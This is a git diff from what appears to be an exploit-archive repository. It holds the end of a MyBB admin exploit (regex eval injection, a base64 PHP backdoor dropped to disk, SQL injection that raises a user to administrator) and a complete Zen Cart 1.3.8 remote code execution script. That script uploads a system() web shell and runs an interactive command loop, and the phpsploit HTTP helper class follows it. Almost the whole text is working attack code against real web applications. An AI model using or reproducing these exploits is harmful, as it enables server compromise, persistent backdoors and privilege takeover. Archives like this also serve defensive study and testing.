("~<!-- start: header_welcomeblock_member_admin --> + — <a href=\"{$this->target}(.+?)/index.php\">~",$rsp,$res)) return False; + + return $res[1][0]; + + + + } + + function loginadmin () + + { + + $this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};"); + $this->postdata = array ('username' => $this->user, 'password' => 
$this->pass, 'do' => 'login'); + + $rsp = $this->post ("{$this->target}/{$this->admindir}/index.php"); + + if (!preg_match_all ('~adminsid=(.+?);~',$rsp,$res)) return False; + + return $res[1][0]; + } + + function writabledirs () + { + $this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/{$this->admindir}/index.php?", 'Cookie' => "mybbuser={$this->mybbuser}; adminsid={$this->adminsid};"); + $this->get ("{$this->target}/{$this->admindir}/index.php?module=tools") ; + + + } + + + function rceOld () + + { + + //edits inc/functions.php (original one) + + $this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'X-Requested-With' => 'XMLHttpRequest', 'Referer' => "{$this->target}/{$this->admindir}/index.php?module=config/mycode&action=edit&cid=1", 'Cookie' => "mybbuser={$this->mybbuser}; adminsid={$this->adminsid};"); + $this->postdata = array ('my_post_key' => $this->mypostkey, + 'o_o' => 'phpinfo();', + 'regex' => '(.*%3F)#e%00', + 'replacement' => 'die(eval(stripslashes($_REQUEST[\'o_o\'])));', + 'test_value' => 'XoD'); + + $rsp = $this->post ("{$this->target}/{$this->admindir}/index.php?module=config/mycode&action=xmlhttp_test_mycode"); + + + } + + function rce () + + { + + $this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'X-Requested-With' => 'XMLHttpRequest', 'Referer' => "{$this->target}/{$this->admindir}/index.php?module=config/mycode&action=edit&cid=1", 'Cookie' => "mybbuser={$this->mybbuser}; adminsid={$this->adminsid};"); + $this->postdata = array ('my_post_key' => $this->mypostkey, + 'o_o' => 'JGZwID0gZm9wZW4oJF9SRVFVRVNUWydmaWxlJ10sICdhJyk7DQpmd3JpdGUoJGZwLCAnPD9QSFAgaWYgKGlzc2V0KCRfUkVRVUVTVFt4XSkpIGV2YWwoc3RyaXBzbGFzaGVzKCRfUkVRVUVTVFt4XSkpOyA/PicpOw0KZmNsb3NlKCRmcCk7', + 'regex' => '(.*%3F)#e%00', + 'replacement' => 'die(eval(base64_decode($_REQUEST[\'o_o\'])));', + 'test_value' => 'XoD', + 'file' => "../{$this->bckdr}"); + + $rsp = $this->post 
("{$this->target}/{$this->admindir}/index.php?module=config/mycode&action=xmlhttp_test_mycode"); + + + } + + + function admin2user () + + { + + $this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};"); + $this->postdata = array ('my_post_key' => $this->mypostkey, + 'invisible' => '1', + 'bday1' => '', + 'bday2' => '', + 'bday3' => '', + 'website' => 'http%3A%2F%2F', + 'profile_fields%5Bfid3%5D' => 'Undisclosed', + 'profile_fields%5Bfid2%5D' => 'Undisclosed', + 'profile_fields%5Bfid1%5D' => 'Undisclosed', + 'usertitle' => '', + 'icq' => '', + 'aim' => '', + 'msn' => '', + 'yahoo' => '', + 'away' => '0', + 'awayreason' => '', + 'awayday' => '', + 'awaymonth' => '', + 'awayyear' => '', + 'birthdayprivacy' => "all', usergroup=2, email='pr3sident.whit3house@gmail.com',regip='79.140.81.83', longregip='1334595923', lastip='', longlastip='", + 'action' => 'do_profile', + 'regsubmit' => '1'); + + $rsp = $this->post ("{$this->target}/usercp.php"); + + } + + function checkrce_old () + + { + $this->header = array ('client-ip' => $this->ip ,'Cookie' => 'x=print \'.:31337:.\'%3B;'); + $rsp = $this->get ("{$this->target}/{$this->admindir}/inc/functions.php?"); + + if (!strstr($rsp,'.:31337:.')) return False; + else return True; + + } + + function checkrce () + + { + $this->header = array ('client-ip' => $this->ip ,'Cookie' => 'x=print \'.:31337:.\'%3B;'); + $rsp = $this->get ("{$this->target}/{$this->bckdr}"); + + if (!strstr($rsp,'.:31337:.')) return False; + else return True; + + } + + + function http ($port = 80, $header = array(), $post = array(), $timeout = 30) + { + + $this->port = $port; + $this->timeout = $timeout; + $this->header = $header; + $this->postdata = $post; + } + + function get ($url) + { + $this->url = parse_url($url); + $this->packet = array(); + + $this->packet[] = "GET {$this->url['path']}?{$this->url['query']}{$this->url['fragment']} 
HTTP/1.1"; + $this->packet[] = "Host: {$this->url['host']}"; + + foreach ($this->header as $header => $value) + { + $this->packet[] = "$header: $value"; + } + + $this->packet[] = "\r\n\r\n"; + $this->packet = implode ("\r\n",$this->packet); + + return $this->conn(); + } + + function post ($url) + { + $this->url = parse_url($url); + + $this->packet = array(); + $this->postcontent = ''; + + $this->packet[] = "POST {$this->url['path']}?{$this->url['query']}{$this->url['fragment']} HTTP/1.1"; + $this->packet[] = "Host: {$this->url['host']}"; + + foreach ($this->header as $header => $value) + { + $this->packet[] = "$header: $value"; + } + + foreach ($this->postdata as $post => $value) + { + if ($this->postcontent != '') $this->postcontent .= '&'; + $this->postcontent .= "$post=$value"; + } + + $this->packet[] = 'Content-Type: application/x-www-form-urlencoded'; + $this->packet[] = "Content-Length: ".strlen($this->postcontent)."\r\n"; + $this->packet[] = $this->postcontent; + + $this->packet = implode ("\r\n",$this->packet); + + return $this->conn(); + } + + + function conn() + { + if (!isset($this->url['port'])) $this->url['port'] = $this->port; + + $sk = fsockopen ($this->url['host'], $this->url['port'], $eno, $estr, $this->timeout); + + if (!is_resource($sk)) return "[-] Fsockopen Failed! Error: ".$estr." [".$eno."]" ; + + else { + + fputs($sk, $this->packet); + $rsp = ""; + + while (!feof($sk)) + { + $rsp .= fgets ($sk, 1024); + } + } + + fclose($sk); + return $rsp; + } + + + +} + + + + +?> + +# milw0rm.com [2009-06-22] diff --git a/platforms/php/webapps/9004.txt b/platforms/php/webapps/9004.txt index f7bdf85e0..035e27a5b 100755 --- a/platforms/php/webapps/9004.txt +++ b/platforms/php/webapps/9004.txt 
@@ -1,734 +1,734 @@ -#!/usr/bin/php -<?php - -# -# ------- Zen Cart 1.3.8 Remote Code Execution -# http://www.zen-cart.com/ -# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone! -# A new version (1.3.8a) is avaible on http://www.zen-cart.com/ -# -# BlackH :) -# - -error_reporting(E_ALL ^ E_NOTICE); -if($argc < 2) -{ -echo " -=___________ Zen Cart 1.3.8 Remote Code Execution Exploit ____________= -======================================================================== -| BlackH <Bl4ck.H@gmail.com> | -======================================================================== -| | -| \$system> php $argv[0] <url> | -| Notes: <url> ex: http://victim.com/site (no slash) | -| | -======================================================================== -";exit(1); -} - - -$url = $argv[1]; -$trick = "/password_forgotten.php"; - -$xpl = new phpsploit(); -$xpl->agent("Mozilla Firefox"); - -$real_kthxbye = remote_exec($url); - -# Remote Code Execution Exploit -function remote_exec($url) { - global $xpl, $url, $trick; - - echo "\n[-] Remote Code Execution"; - - if(!$xpl->get($url.'/admin/')) die("\n[!] error - the /admin/ directory is protected or don't exist.\n"); - - $n = substr(md5(rand(0, 1337)), 0, 5).".php"; # random php file - $code = '<?php system($_SERVER["HTTP_SHELL"]); ?>'; - - $form = array(frmdt_url => $url."/admin/record_company.php".$trick."?action=insert", - "record_company_name" => "0", - "record_company_image" => array(frmdt_type => "tgreal/suce", # it works ! o_O - frmdt_filename => $n, - frmdt_content => $code)); - - if($xpl->formdata($form)) echo "\n[!] Done - Start Shell: ".$n; - else die("\n[!] 
error - can't upload the shell\n"); - - print "\nrce@jah\$> "; - - while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))){ - $xpl->addheader('SHELL',$cmd); - $xpl->get($url.'/images/'.$n); - print $xpl->getcontent()."\nrce@jah$> "; - # don't forget to "rm *.php" and exit - # you can use "Zen Cart 1.3.8 Remote SQL Execution Exploit" - # to clean the database (record_company & record_company_info) - } -} - -/* - * - * Copyright (C) darkfig - * - * This program is free software; you can redistribute it and/or - * modify it under the terms of the GNU General Public License - * as published by the Free Software Foundation; either version 2 - * of the License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. - * - * You should have received a copy of the GNU General Public License - * along with this program; if not, write to the Free Software - * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. - * - * TITLE: PhpSploit Class - * REQUIREMENTS: PHP 4 / PHP 5 - * VERSION: 2.0 - * LICENSE: GNU General Public License - * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt - * FILENAME: phpsploitclass.php - * - * CONTACT: gmdarkfig@gmail.com (french / english) - * GREETZ: Sparah, Ddx39 - * - * DESCRIPTION: - * The phpsploit is a class implementing a web user agent. - * You can add cookies, headers, use a proxy server with (or without) a - * basic authentification. It supports the GET and the POST method. It can - * also be used like a browser with the cookiejar() function (which allow - * a server to add several cookies for the next requests) and the - * allowredirection() function (which allow the script to follow all - * redirections sent by the server). 
It can return the content (or the - * headers) of the request. Others useful functions can be used for debugging. - * A manual is actually in development but to know how to use it, you can - * read the comments. - * - * CHANGELOG: - * - * [2007-06-10] (2.0) - * * Code: Code optimization - * * New: Compatible with PHP 4 by default - * - * [2007-01-24] (1.2) - * * Bug #2 fixed: Problem concerning the getcookie() function ((|;)) - * * New: multipart/form-data enctype is now supported - * - * [2006-12-31] (1.1) - * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug) - * * New: You can now call the getheader() / getcontent() function without parameters - * - * [2006-12-30] (1.0) - * * First version - * - */ - -class phpsploit -{ - var $proxyhost; - var $proxyport; - var $host; - var $path; - var $port; - var $method; - var $url; - var $packet; - var $proxyuser; - var $proxypass; - var $header; - var $cookie; - var $data; - var $boundary; - var $allowredirection; - var $last_redirection; - var $cookiejar; - var $recv; - var $cookie_str; - var $header_str; - var $server_content; - var $server_header; - - - /** - * This function is called by the - * get()/post()/formdata() functions. - * You don't have to call it, this is - * the main function. - * - * @access private - * @return string $this->recv ServerResponse - * - */ - function sock() - { - if(!empty($this->proxyhost) && !empty($this->proxyport)) - $socket = @fsockopen($this->proxyhost,$this->proxyport); - else - $socket = @fsockopen($this->host,$this->port); - - if(!$socket) - die("Error: Host seems down"); - - if($this->method=='get') - $this->packet = 'GET '.$this->url." HTTP/1.1\r\n"; - - elseif($this->method=='post' or $this->method=='formdata') - $this->packet = 'POST '.$this->url." 
HTTP/1.1\r\n"; - - else - die("Error: Invalid method"); - - if(!empty($this->proxyuser)) - $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n"; - - if(!empty($this->header)) - $this->packet .= $this->showheader(); - - if(!empty($this->cookie)) - $this->packet .= 'Cookie: '.$this->showcookie()."\r\n"; - - $this->packet .= 'Host: '.$this->host."\r\n"; - $this->packet .= "Connection: Close\r\n"; - - if($this->method=='post') - { - $this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; - $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; - $this->packet .= $this->data."\r\n"; - } - elseif($this->method=='formdata') - { - $this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n"; - $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; - $this->packet .= $this->data; - } - - $this->packet .= "\r\n"; - $this->recv = ''; - - fputs($socket,$this->packet); - - while(!feof($socket)) - $this->recv .= fgets($socket); - - fclose($socket); - - if($this->cookiejar) - $this->getcookie(); - - if($this->allowredirection) - return $this->getredirection(); - else - return $this->recv; - } - - - /** - * This function allows you to add several - * cookies in the request. - * - * @access public - * @param string cookn CookieName - * @param string cookv CookieValue - * @example $this->addcookie('name','value') - * - */ - function addcookie($cookn,$cookv) - { - if(!isset($this->cookie)) - $this->cookie = array(); - - $this->cookie[$cookn] = $cookv; - } - - - /** - * This function allows you to add several - * headers in the request. 
- * - * @access public - * @param string headern HeaderName - * @param string headervalue Headervalue - * @example $this->addheader('Client-IP', '128.5.2.3') - * - */ - function addheader($headern,$headervalue) - { - if(!isset($this->header)) - $this->header = array(); - - $this->header[$headern] = $headervalue; - } - - - /** - * This function allows you to use an - * http proxy server. Several methods - * are supported. - * - * @access public - * @param string proxy ProxyHost - * @param integer proxyp ProxyPort - * @example $this->proxy('localhost',8118) - * @example $this->proxy('localhost:8118') - * - */ - function proxy($proxy,$proxyp='') - { - if(empty($proxyp)) - { - $proxarr = explode(':',$proxy); - $this->proxyhost = $proxarr[0]; - $this->proxyport = (int)$proxarr[1]; - } - else - { - $this->proxyhost = $proxy; - $this->proxyport = (int)$proxyp; - } - - if($this->proxyport > 65535) - die("Error: Invalid port number"); - } - - - /** - * This function allows you to use an - * http proxy server which requires a - * basic authentification. Several - * methods are supported: - * - * @access public - * @param string proxyauth ProxyUser - * @param string proxypass ProxyPass - * @example $this->proxyauth('user','pwd') - * @example $this->proxyauth('user:pwd'); - * - */ - function proxyauth($proxyauth,$proxypass='') - { - if(empty($proxypass)) - { - $posvirg = strpos($proxyauth,':'); - $this->proxyuser = substr($proxyauth,0,$posvirg); - $this->proxypass = substr($proxyauth,$posvirg+1); - } - else - { - $this->proxyuser = $proxyauth; - $this->proxypass = $proxypass; - } - } - - - /** - * This function allows you to set - * the 'User-Agent' header. - * - * @access public - * @param string useragent Agent - * @example $this->agent('Firefox') - * - */ - function agent($useragent) - { - $this->addheader('User-Agent',$useragent); - } - - - /** - * This function returns the headers - * which will be in the next request. 
- * - * @access public - * @return string $this->header_str Headers - * @example $this->showheader() - * - */ - function showheader() - { - $this->header_str = ''; - - if(!isset($this->header)) - return; - - foreach($this->header as $name => $value) - $this->header_str .= $name.': '.$value."\r\n"; - - return $this->header_str; - } - - - /** - * This function returns the cookies - * which will be in the next request. - * - * @access public - * @return string $this->cookie_str Cookies - * @example $this->showcookie() - * - */ - function showcookie() - { - $this->cookie_str = ''; - - if(!isset($this->cookie)) - return; - - foreach($this->cookie as $name => $value) - $this->cookie_str .= $name.'='.$value.'; '; - - return $this->cookie_str; - } - - - /** - * This function returns the last - * formed http request. - * - * @access public - * @return string $this->packet HttpPacket - * @example $this->showlastrequest() - * - */ - function showlastrequest() - { - if(!isset($this->packet)) - return; - else - return $this->packet; - } - - - /** - * This function sends the formed - * http packet with the GET method. - * - * @access public - * @param string url Url - * @return string $this->sock() - * @example $this->get('localhost/index.php?var=x') - * @example $this->get('http://localhost:88/tst.php') - * - */ - function get($url) - { - $this->target($url); - $this->method = 'get'; - return $this->sock(); - } - - - /** - * This function sends the formed - * http packet with the POST method. - * - * @access public - * @param string url Url - * @param string data PostData - * @return string $this->sock() - * @example $this->post('http://localhost/','helo=x') - * - */ - function post($url,$data) - { - $this->target($url); - $this->method = 'post'; - $this->data = $data; - return $this->sock(); - } - - - /** - * This function sends the formed http - * packet with the POST method using - * the multipart/form-data enctype. 
- * - * @access public - * @param array array FormDataArray - * @return string $this->sock() - * @example $formdata = array( - * frmdt_url => 'http://localhost/upload.php', - * frmdt_boundary => '123456', # Optional - * 'var' => 'example', - * 'file' => array( - * frmdt_type => 'image/gif', # Optional - * frmdt_transfert => 'binary' # Optional - * frmdt_filename => 'hello.php, - * frmdt_content => '<?php echo 1; ?>')); - * $this->formdata($formdata); - * - */ - function formdata($array) - { - $this->target($array[frmdt_url]); - $this->method = 'formdata'; - $this->data = ''; - - if(!isset($array[frmdt_boundary])) - $this->boundary = 'phpsploit'; - else - $this->boundary = $array[frmdt_boundary]; - - foreach($array as $key => $value) - { - if(!preg_match('#^frmdt_(boundary|url)#',$key)) - { - $this->data .= str_repeat('-',29).$this->boundary."\r\n"; - $this->data .= 'Content-Disposition: form-data; name="'.$key.'";'; - - if(!is_array($value)) - { - $this->data .= "\r\n\r\n".$value."\r\n"; - } - else - { - $this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n"; - - if(isset($array[$key][frmdt_type])) - $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n"; - - if(isset($array[$key][frmdt_transfert])) - $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n"; - - $this->data .= "\r\n".$array[$key][frmdt_content]."\r\n"; - } - } - } - - $this->data .= str_repeat('-',29).$this->boundary."--\r\n"; - return $this->sock(); - } - - - /** - * This function returns the content - * of the server response, without - * the headers. 
- * - * @access public - * @param string code ServerResponse - * @return string $this->server_content - * @example $this->getcontent() - * @example $this->getcontent($this->get('http://localhost/')) - * - */ - function getcontent($code='') - { - if(empty($code)) - $code = $this->recv; - - $code = explode("\r\n\r\n",$code); - $this->server_content = ''; - - for($i=1;$i<count($code);$i++) - $this->server_content .= $code[$i]; - - return $this->server_content; - } - - - /** - * This function returns the headers - * of the server response, without - * the content. - * - * @access public - * @param string code ServerResponse - * @return string $this->server_header - * @example $this->getcontent() - * @example $this->getcontent($this->post('http://localhost/','1=2')) - * - */ - function getheader($code='') - { - if(empty($code)) - $code = $this->recv; - - $code = explode("\r\n\r\n",$code); - $this->server_header = $code[0]; - - return $this->server_header; - } - - - /** - * This function is called by the - * cookiejar() function. It adds the - * value of the "Set-Cookie" header - * in the "Cookie" header for the - * next request. You don't have to - * call it. - * - * @access private - * @param string code ServerResponse - * - */ - function getcookie() - { - foreach(explode("\r\n",$this->getheader()) as $header) - { - if(preg_match('/set-cookie/i',$header)) - { - $fequal = strpos($header,'='); - $fvirgu = strpos($header,';'); - - // 12=strlen('set-cookie: ') - $cname = substr($header,12,$fequal-12); - $cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1)); - - $this->cookie[trim($cname)] = trim($cvalu); - } - } - } - - - /** - * This function is called by the - * get()/post() functions. You - * don't have to call it. 
- * - * @access private - * @param string urltarg Url - * @example $this->target('http://localhost/') - * - */ - function target($urltarg) - { - if(!ereg('^http://',$urltarg)) - $urltarg = 'http://'.$urltarg; - - $urlarr = parse_url($urltarg); - $this->url = 'http://'.$urlarr['host'].$urlarr['path']; - - if(isset($urlarr['query'])) - $this->url .= '?'.$urlarr['query']; - - $this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80; - $this->host = $urlarr['host']; - - if($this->port != '80') - $this->host .= ':'.$this->port; - - if(!isset($urlarr['path']) or empty($urlarr['path'])) - die("Error: No path precised"); - - $this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1); - - if($this->port > 65535) - die("Error: Invalid port number"); - } - - - /** - * If you call this function, - * the script will extract all - * 'Set-Cookie' headers values - * and it will automatically add - * them into the 'Cookie' header - * for all next requests. - * - * @access public - * @param integer code 1(enabled) 0(disabled) - * @example $this->cookiejar(0) - * @example $this->cookiejar(1) - * - */ - function cookiejar($code) - { - if($code=='0') - $this->cookiejar=FALSE; - - elseif($code=='1') - $this->cookiejar=TRUE; - } - - - /** - * If you call this function, - * the script will follow all - * redirections sent by the server. - * - * @access public - * @param integer code 1(enabled) 0(disabled) - * @example $this->allowredirection(0) - * @example $this->allowredirection(1) - * - */ - function allowredirection($code) - { - if($code=='0') - $this->allowredirection=FALSE; - - elseif($code=='1') - $this->allowredirection=TRUE; - } - - - /** - * This function is called if - * allowredirection() is enabled. - * You don't have to call it. 
- * - * @access private - * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection) - * @return string $this->get($this->last_redirection) - * @return string $this->recv; - * - */ - function getredirection() - { - if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr)) - { - $this->last_redirection = trim($codearr[2]); - - if(!ereg('://',$this->last_redirection)) - return $this->get('http://'.$this->host.$this->path.$this->last_redirection); - - else - return $this->get($this->last_redirection); - } - else - return $this->recv; - } - - - /** - * This function allows you - * to reset some parameters. - * - * @access public - * @param string func Param - * @example $this->reset('header') - * @example $this->reset('cookie') - * @example $this->reset() - * - */ - function reset($func='') - { - switch($func) - { - case 'header': - $this->header = array(''); - break; - - case 'cookie': - $this->cookie = array(''); - break; - - default: - $this->cookiejar = ''; - $this->header = array(''); - $this->cookie = array(''); - $this->allowredirection = ''; - break; - } - } -} - -?> - -# milw0rm.com [2009-06-23] +#!/usr/bin/php +<?php + +# +# ------- Zen Cart 1.3.8 Remote Code Execution +# http://www.zen-cart.com/ +# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone! 
+# A new version (1.3.8a) is avaible on http://www.zen-cart.com/ +# +# BlackH :) +# + +error_reporting(E_ALL ^ E_NOTICE); +if($argc < 2) +{ +echo " +=___________ Zen Cart 1.3.8 Remote Code Execution Exploit ____________= +======================================================================== +| BlackH <Bl4ck.H@gmail.com> | +======================================================================== +| | +| \$system> php $argv[0] <url> | +| Notes: <url> ex: http://victim.com/site (no slash) | +| | +======================================================================== +";exit(1); +} + + +$url = $argv[1]; +$trick = "/password_forgotten.php"; + +$xpl = new phpsploit(); +$xpl->agent("Mozilla Firefox"); + +$real_kthxbye = remote_exec($url); + +# Remote Code Execution Exploit +function remote_exec($url) { + global $xpl, $url, $trick; + + echo "\n[-] Remote Code Execution"; + + if(!$xpl->get($url.'/admin/')) die("\n[!] error - the /admin/ directory is protected or don't exist.\n"); + + $n = substr(md5(rand(0, 1337)), 0, 5).".php"; # random php file + $code = '<?php system($_SERVER["HTTP_SHELL"]); ?>'; + + $form = array(frmdt_url => $url."/admin/record_company.php".$trick."?action=insert", + "record_company_name" => "0", + "record_company_image" => array(frmdt_type => "tgreal/suce", # it works ! o_O + frmdt_filename => $n, + frmdt_content => $code)); + + if($xpl->formdata($form)) echo "\n[!] Done - Start Shell: ".$n; + else die("\n[!] 
error - can't upload the shell\n"); + + print "\nrce@jah\$> "; + + while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))){ + $xpl->addheader('SHELL',$cmd); + $xpl->get($url.'/images/'.$n); + print $xpl->getcontent()."\nrce@jah$> "; + # don't forget to "rm *.php" and exit + # you can use "Zen Cart 1.3.8 Remote SQL Execution Exploit" + # to clean the database (record_company & record_company_info) + } +} + +/* + * + * Copyright (C) darkfig + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version 2 + * of the License, or (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software + * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. + * + * TITLE: PhpSploit Class + * REQUIREMENTS: PHP 4 / PHP 5 + * VERSION: 2.0 + * LICENSE: GNU General Public License + * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt + * FILENAME: phpsploitclass.php + * + * CONTACT: gmdarkfig@gmail.com (french / english) + * GREETZ: Sparah, Ddx39 + * + * DESCRIPTION: + * The phpsploit is a class implementing a web user agent. + * You can add cookies, headers, use a proxy server with (or without) a + * basic authentification. It supports the GET and the POST method. It can + * also be used like a browser with the cookiejar() function (which allow + * a server to add several cookies for the next requests) and the + * allowredirection() function (which allow the script to follow all + * redirections sent by the server). 
It can return the content (or the + * headers) of the request. Others useful functions can be used for debugging. + * A manual is actually in development but to know how to use it, you can + * read the comments. + * + * CHANGELOG: + * + * [2007-06-10] (2.0) + * * Code: Code optimization + * * New: Compatible with PHP 4 by default + * + * [2007-01-24] (1.2) + * * Bug #2 fixed: Problem concerning the getcookie() function ((|;)) + * * New: multipart/form-data enctype is now supported + * + * [2006-12-31] (1.1) + * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug) + * * New: You can now call the getheader() / getcontent() function without parameters + * + * [2006-12-30] (1.0) + * * First version + * + */ + +class phpsploit +{ + var $proxyhost; + var $proxyport; + var $host; + var $path; + var $port; + var $method; + var $url; + var $packet; + var $proxyuser; + var $proxypass; + var $header; + var $cookie; + var $data; + var $boundary; + var $allowredirection; + var $last_redirection; + var $cookiejar; + var $recv; + var $cookie_str; + var $header_str; + var $server_content; + var $server_header; + + + /** + * This function is called by the + * get()/post()/formdata() functions. + * You don't have to call it, this is + * the main function. + * + * @access private + * @return string $this->recv ServerResponse + * + */ + function sock() + { + if(!empty($this->proxyhost) && !empty($this->proxyport)) + $socket = @fsockopen($this->proxyhost,$this->proxyport); + else + $socket = @fsockopen($this->host,$this->port); + + if(!$socket) + die("Error: Host seems down"); + + if($this->method=='get') + $this->packet = 'GET '.$this->url." HTTP/1.1\r\n"; + + elseif($this->method=='post' or $this->method=='formdata') + $this->packet = 'POST '.$this->url." 
HTTP/1.1\r\n"; + + else + die("Error: Invalid method"); + + if(!empty($this->proxyuser)) + $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n"; + + if(!empty($this->header)) + $this->packet .= $this->showheader(); + + if(!empty($this->cookie)) + $this->packet .= 'Cookie: '.$this->showcookie()."\r\n"; + + $this->packet .= 'Host: '.$this->host."\r\n"; + $this->packet .= "Connection: Close\r\n"; + + if($this->method=='post') + { + $this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; + $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; + $this->packet .= $this->data."\r\n"; + } + elseif($this->method=='formdata') + { + $this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n"; + $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; + $this->packet .= $this->data; + } + + $this->packet .= "\r\n"; + $this->recv = ''; + + fputs($socket,$this->packet); + + while(!feof($socket)) + $this->recv .= fgets($socket); + + fclose($socket); + + if($this->cookiejar) + $this->getcookie(); + + if($this->allowredirection) + return $this->getredirection(); + else + return $this->recv; + } + + + /** + * This function allows you to add several + * cookies in the request. + * + * @access public + * @param string cookn CookieName + * @param string cookv CookieValue + * @example $this->addcookie('name','value') + * + */ + function addcookie($cookn,$cookv) + { + if(!isset($this->cookie)) + $this->cookie = array(); + + $this->cookie[$cookn] = $cookv; + } + + + /** + * This function allows you to add several + * headers in the request. 
+ * + * @access public + * @param string headern HeaderName + * @param string headervalue Headervalue + * @example $this->addheader('Client-IP', '128.5.2.3') + * + */ + function addheader($headern,$headervalue) + { + if(!isset($this->header)) + $this->header = array(); + + $this->header[$headern] = $headervalue; + } + + + /** + * This function allows you to use an + * http proxy server. Several methods + * are supported. + * + * @access public + * @param string proxy ProxyHost + * @param integer proxyp ProxyPort + * @example $this->proxy('localhost',8118) + * @example $this->proxy('localhost:8118') + * + */ + function proxy($proxy,$proxyp='') + { + if(empty($proxyp)) + { + $proxarr = explode(':',$proxy); + $this->proxyhost = $proxarr[0]; + $this->proxyport = (int)$proxarr[1]; + } + else + { + $this->proxyhost = $proxy; + $this->proxyport = (int)$proxyp; + } + + if($this->proxyport > 65535) + die("Error: Invalid port number"); + } + + + /** + * This function allows you to use an + * http proxy server which requires a + * basic authentification. Several + * methods are supported: + * + * @access public + * @param string proxyauth ProxyUser + * @param string proxypass ProxyPass + * @example $this->proxyauth('user','pwd') + * @example $this->proxyauth('user:pwd'); + * + */ + function proxyauth($proxyauth,$proxypass='') + { + if(empty($proxypass)) + { + $posvirg = strpos($proxyauth,':'); + $this->proxyuser = substr($proxyauth,0,$posvirg); + $this->proxypass = substr($proxyauth,$posvirg+1); + } + else + { + $this->proxyuser = $proxyauth; + $this->proxypass = $proxypass; + } + } + + + /** + * This function allows you to set + * the 'User-Agent' header. + * + * @access public + * @param string useragent Agent + * @example $this->agent('Firefox') + * + */ + function agent($useragent) + { + $this->addheader('User-Agent',$useragent); + } + + + /** + * This function returns the headers + * which will be in the next request. 
+ * + * @access public + * @return string $this->header_str Headers + * @example $this->showheader() + * + */ + function showheader() + { + $this->header_str = ''; + + if(!isset($this->header)) + return; + + foreach($this->header as $name => $value) + $this->header_str .= $name.': '.$value."\r\n"; + + return $this->header_str; + } + + + /** + * This function returns the cookies + * which will be in the next request. + * + * @access public + * @return string $this->cookie_str Cookies + * @example $this->showcookie() + * + */ + function showcookie() + { + $this->cookie_str = ''; + + if(!isset($this->cookie)) + return; + + foreach($this->cookie as $name => $value) + $this->cookie_str .= $name.'='.$value.'; '; + + return $this->cookie_str; + } + + + /** + * This function returns the last + * formed http request. + * + * @access public + * @return string $this->packet HttpPacket + * @example $this->showlastrequest() + * + */ + function showlastrequest() + { + if(!isset($this->packet)) + return; + else + return $this->packet; + } + + + /** + * This function sends the formed + * http packet with the GET method. + * + * @access public + * @param string url Url + * @return string $this->sock() + * @example $this->get('localhost/index.php?var=x') + * @example $this->get('http://localhost:88/tst.php') + * + */ + function get($url) + { + $this->target($url); + $this->method = 'get'; + return $this->sock(); + } + + + /** + * This function sends the formed + * http packet with the POST method. + * + * @access public + * @param string url Url + * @param string data PostData + * @return string $this->sock() + * @example $this->post('http://localhost/','helo=x') + * + */ + function post($url,$data) + { + $this->target($url); + $this->method = 'post'; + $this->data = $data; + return $this->sock(); + } + + + /** + * This function sends the formed http + * packet with the POST method using + * the multipart/form-data enctype. 
